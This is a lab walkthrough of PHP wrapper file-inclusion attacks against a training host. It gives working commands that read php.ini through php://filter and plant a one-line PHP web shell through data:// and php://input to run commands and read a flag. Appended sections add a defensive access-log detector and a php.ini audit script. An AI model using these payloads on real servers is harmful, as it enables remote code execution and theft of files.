# PHP Wrappers

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F4yMZ5X03EK0CVJdhP4O5%2Fimage.png?alt=media&#x26;token=09e087a6-d56c-4397-b3dd-09f10744d148" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
curl "http://94.237.49.182:39505/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F0RXALxtUBCtNpsvMz2My%2Fimage.png?alt=media&#x26;token=fd49dc84-c1f2-4dae-a990-b3a79a38637b" alt=""><figcaption></figcaption></figure>

Or we could just open the same URL in the browser.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FdKNt3tKc8qCbhgL8MjrU%2Fimage.png?alt=media&#x26;token=a596e6c2-4559-4c7f-9fc7-c3166fde7af0" alt=""><figcaption></figcaption></figure>

Decode the base64 output in the terminal. As we can see, `allow_url_include` is On, which means the `data://` and `php://input` wrappers can be used to get RCE.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Ffc82Vi4rLXPzdUFXzkWM%2Fimage.png?alt=media&#x26;token=a076eea9-95f9-4a76-a4d5-69de58aad340" alt=""><figcaption></figcaption></figure>

```
echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FZfLTYAbQE1Ofk4zgsV8V%2Fimage.png?alt=media&#x26;token=eb2c2350-70f9-450c-a6ff-e75e39ff6d32" alt=""><figcaption></figcaption></figure>

As we can see, we now have RCE on the server.

* First, using curl:

{% code overflow="wrap" %}

```
curl -s 'http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F66G9MuBVv9K60ZREj9fb%2Fimage.png?alt=media&#x26;token=c3aafe7f-3a00-4845-8c35-64fbb8ae9d33" alt=""><figcaption></figcaption></figure>

* Second, in the browser:

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F5wmuccSAunvr5qiKAwjS%2Fimage.png?alt=media&#x26;token=059902c2-38fe-4fd0-a5de-9fb10bd387c8" alt=""><figcaption></figcaption></figure>

After that, we can list the files in the web server's current directory:

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FlKFcXqLJe74JZUot7Euf%2Fimage.png?alt=media&#x26;token=ab64b918-a4a0-4849-9ea3-969fe7c0a1f2" alt=""><figcaption></figcaption></figure>

Then we can list the `/` directory and view the flag there:

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cd /; ls
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FlTaBPG7LKbKbbG1f33Md%2Fimage.png?alt=media&#x26;token=25583b26-153e-488b-811c-de22bcaceccc" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Fv0FAWec5tccm8H9ThL7T%2Fimage.png?alt=media&#x26;token=fb71699f-d09a-4103-8bd6-7b074bd72b3b" alt=""><figcaption></figcaption></figure>

**The second way to get RCE is the `php://input` wrapper**

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FDuofDlUAiomPxno8fLtv%2Fimage.png?alt=media&#x26;token=d68f3475-3ca7-4bac-be93-50120de08888" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://94.237.49.182:39505/index.php?language=php://input&cmd=ls"
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F4u0bQOlH0IJRbMzTkJEk%2Fimage.png?alt=media&#x26;token=0191a167-fc47-4278-900e-f086232f7af4" alt=""><figcaption></figcaption></figure>
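From the defender's side, every request above leaves the same trace in the web server's access log: a query parameter whose value starts with a stream wrapper. The following detector is an added example, not part of the original writeup; it assumes combined-format access logs, its function names are hypothetical, the log lines are constructed, and it also covers the `expect://` form.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Wrapper forms used in this walkthrough, matched at the start of a parameter value.
WRAPPER = re.compile(r"(php://filter|php://input|data:(?://)?|expect://)", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def data_uri_has_php(value):
    """True if a data: URI (plain or base64) carries a PHP open tag."""
    _, sep, payload = value.partition(";base64,")
    if not sep:
        return "<?" in value
    try:
        raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
    except (binascii.Error, ValueError):
        return False
    return b"<?" in raw

def scan_line(line):
    """Return (param, wrapper, carries_php) for each parameter that starts with a wrapper."""
    m = REQUEST.search(line)
    hits = []
    for pair in (m.group(1).partition("?")[2].split("&") if m else []):
        name, _, value = pair.partition("=")
        value = fully_unquote(value).strip()
        w = WRAPPER.match(value)
        if w:
            kind = w.group(1).lower()
            hits.append((name, kind, kind.startswith("data:") and data_uri_has_php(value)))
    return hits

# Constructed log lines (192.0.2.0/24 is a documentation range); the data:// payload is the one shown above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 3120',
    '192.0.2.66 - - [01/Jan/2025:10:01:00 +0000] "GET /index.php?language=php%253A%252F%252Ffilter/read=convert.base64-encode/resource=config HTTP/1.1" 200 5321',
    '192.0.2.66 - - [01/Jan/2025:10:02:00 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id HTTP/1.1" 200 198',
    '192.0.2.66 - - [01/Jan/2025:10:03:00 +0000] "POST /index.php?language=php://input&cmd=ls HTTP/1.1" 200 240',
]
```

For `php://input` the PHP code travels in the POST body, which access logs do not record, so the wrapper in the URL is the only indicator there.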

**The third way is the `expect` wrapper; first check the decoded php.ini for it**

```
echo 'BASE64 OF php.ini' | base64 -d | grep expect
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FJakxuy3Xlodmt4zLHePi%2Fimage.png?alt=media&#x26;token=62b9b613-2661-4138-8275-271594fc3958" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FARzItkPzHMOBV6FQz31R%2Fimage.png?alt=media&#x26;token=dfb44594-3b58-437e-96ed-28726dbbcab5" alt=""><figcaption></figcaption></figure>
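The two php.ini checks in this walkthrough (`allow_url_include` earlier, and the `grep expect` above) can be run as a configuration audit on your own servers. This is an added example, not part of the original writeup; the function names are hypothetical and both sample configurations are constructed.

```python
import base64
import re

TRUE_VALUES = {"1", "on", "yes", "true"}

def parse_php_ini(text):
    """Return (directives, extensions); a later assignment overrides an earlier one."""
    directives, extensions = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[":       # blank, comment, or [section] header
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.split(";", 1)[0].strip().strip("\"'")  # drop inline comment, quotes
        if key.strip().lower() == "extension":
            extensions.append(value)
        else:
            directives[key.strip().lower()] = value
    return directives, extensions

def audit_php_ini(text):
    """List (setting, reason) pairs for the two settings this walkthrough checks."""
    directives, extensions = parse_php_ini(text)
    findings = []
    if directives.get("allow_url_include", "0").lower() in TRUE_VALUES:
        findings.append(("allow_url_include",
                         "data:// and php://input can be passed to include() as code"))
    for ext in extensions:
        name = re.split(r"[\\/]", ext)[-1].lower()
        if re.fullmatch(r"(php_)?expect(\.so|\.dll)?", name):
            findings.append(("extension=expect", "expect:// wrapper is registered"))
    return findings

def audit_base64_dump(b64_text):
    """Audit a php.ini captured as base64, the form a php://filter read returns."""
    return audit_php_ini(base64.b64decode(b64_text).decode("utf-8", "replace"))

# Constructed samples, not taken from the target in the walkthrough.
WEAK_INI = "[PHP]\nallow_url_fopen = On\nallow_url_include = On ; enabled for testing\nextension=expect\n"
HARDENED_INI = "[PHP]\nallow_url_include = Off\n;extension=expect\n"

if __name__ == "__main__":
    for setting, reason in audit_php_ini(WEAK_INI):
        print(f"[!] {setting}: {reason}")
```

An empty result for a production php.ini means neither of the two preconditions used in this walkthrough is present.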
